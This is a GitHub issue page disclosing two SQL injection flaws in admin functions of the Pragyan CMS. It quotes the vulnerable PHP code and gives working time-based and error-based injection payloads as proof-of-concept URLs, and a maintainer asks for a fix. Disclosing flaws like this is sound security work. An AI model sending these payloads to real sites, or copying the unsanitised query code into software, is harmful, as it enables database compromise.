function getSuggestions($pattern) {
$suggestionsQuery = "SELECT IF(user_email LIKE \"$pattern%\", 1, " .
"IF(`user_fullname` LIKE \"$pattern%\", 2, " .
"IF(`user_fullname` LIKE \"% $pattern%\", 3, " .
"IF(`user_email` LIKE \"%$pattern%\", 4, " .
"IF(`user_fullname` LIKE \"%$pattern%\", 5, 6" .
"))))) AS `relevance`, `user_email`, `user_fullname` FROM `".MYSQL_DATABASE_PREFIX."users` WHERE `user_activated`=1 AND(`user_email` LIKE \"%$pattern%\" OR `user_fullname` LIKE \"%$pattern%\" ) ORDER BY `relevance`";
// echo $suggestionsQuery;
$suggestionsResult = mysqli_query($GLOBALS["___mysqli_ston"], $suggestionsQuery);
$suggestions = array($pattern);
while($suggestionsRow = mysqli_fetch_row($suggestionsResult)) {
$suggestions[] = $suggestionsRow[1] . ' - ' . $suggestionsRow[2];
}
return join($suggestions, ',');
}
no filter at all, so we can cause a boolean-base sql injection. PoC like: pragyan/home/+admin&doaction=getsuggestions&forwhat="and sleep(10) and "admin" like "admin
the second one in line 252
function delete_blacklist()
{
$id = safe_html($_GET['del_black']);
$query = "DELETE FROM `".MYSQL_DATABASE_PREFIX."blacklist` WHERE `id` = '$id'";
$result =mysqli_query($GLOBALS["___mysqli_ston"], $query) or displayerror("Unable to Delete blacklist". ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)));
if(mysqli_affected_rows($GLOBALS["___mysqli_ston"])>0)
displayinfo("Blackilist Deleted Successfully");
return 1;
}
function safe_html():
function safe_html($html)
{
return htmlspecialchars(strip_tags($html));
}
htmlspecialchars() has nothing to do with sql injection, so we can use error-base sql injection
PoC:pragyan/home/+admin&subaction=global&del_black=4'and updatexml(1,concat(0x7e,(select @@version),0x7e),1) and '1'='1
The text was updated successfully, but these errors were encountered:
@suhithr Find someone to fix this -- shouldn't be too tough. ("admin" permissions should only be given to trusted users so the risk shouldn't be too high.)
both two vulnerabilities need to login as admin
first in
cms/admin.lib.phpline 358function getSuggestions:
no filter at all, so we can cause a boolean-base sql injection. PoC like:
pragyan/home/+admin&doaction=getsuggestions&forwhat="and sleep(10) and "admin" like "adminthe second one in line 252
function safe_html():
htmlspecialchars() has nothing to do with sql injection, so we can use error-base sql injection
PoC:
pragyan/home/+admin&subaction=global&del_black=4'and updatexml(1,concat(0x7e,(select @@version),0x7e),1) and '1'='1The text was updated successfully, but these errors were encountered: